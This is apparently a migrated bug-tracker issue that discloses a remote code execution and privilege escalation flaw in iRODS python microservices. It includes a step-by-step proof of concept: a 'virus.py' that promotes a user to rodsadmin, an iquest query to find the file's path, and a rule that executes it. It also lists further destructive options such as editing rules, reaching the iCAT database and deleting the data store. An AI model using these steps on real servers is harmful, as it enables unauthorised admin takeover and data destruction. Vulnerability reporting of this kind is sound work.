Skip to content

security flaw: remote code invocation  #11

Open
Open
security flaw: remote code invocation #11
Labels
Priority-MediumType-Defectauto-migrated
@GoogleCodeExporter

Description

@GoogleCodeExporter
GoogleCodeExporter
opened on Aug 13, 2015
Prerequisites:
*)access to remote irods server (with normal user rights)
**)remote server must have pyrods and embedPython installed

Those two are enough to do remote code invocation and call any linux
command (or set of commands) on the remote machine with the rights of
the user the irods server is running with.
In a typical installation, also icommands are installed on the remote
server and the credentials for irodsadmin are created in
~/.irods/.irodsEnv. In the following we will show how this can be used
to escalate the rights in irods and upgrade the normal user from (*) to
irodsadmin on the remote server.

1) create virus.py:
import subprocess
def test_python(rei):
    call(["iadmin","moduser","testuser2","type","rodsadmin"])

testuser2 should be the user name on the remote server (*)

2) upload it to a remote irods (iput virus.py)

3) find out physical path of the uploaded file:
iquest "%s" "select DATA_PATH where DATA_NAME like '%virus.py%'"

4) run a rule from a local machine:
testPythoni () {
  msiPyInitialize();
    msiLocalPython(*pyScript, *methName, "noRecursionTest");
  msiPyFinalize();
}
INPUT *pyScript="/opt/irods/data/home/testuser2/virus.py",
*methName="test_python"
OUTPUT ruleExecOut

where *pyScript points on the physical location obtained in step 3)

U-HA you are the admin!

The issue is: python microservices allow to call any python script on the 
server if only physical path to that file is known. This can be found out by 
issuing iCAT query. 
Please note that the msiExecCmd (standard microservice provided by irods to run 
bash scripts) allows only to run scripts located on a special directory on the 
server, thus it is not possible to upload first such a script with iput and 
then run it with irule. 

This is only example what can you do if you can program python better
then me:
-find where core.re is located on the remote machine and add some
content there (admin rules)
-try to access the iCAT database could be possible e.g. with "isql ICAT"
-change linux password of the user running irods server, or create new
user and log in into shell
-remove irods server or the data store

Original issue reported on code.google.com by ryba...@gmail.com on 27 Jul 2012 at 8:12

Metadata

Metadata

Assignees

No one assigned

    Labels

    Priority-MediumType-Defectauto-migrated

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions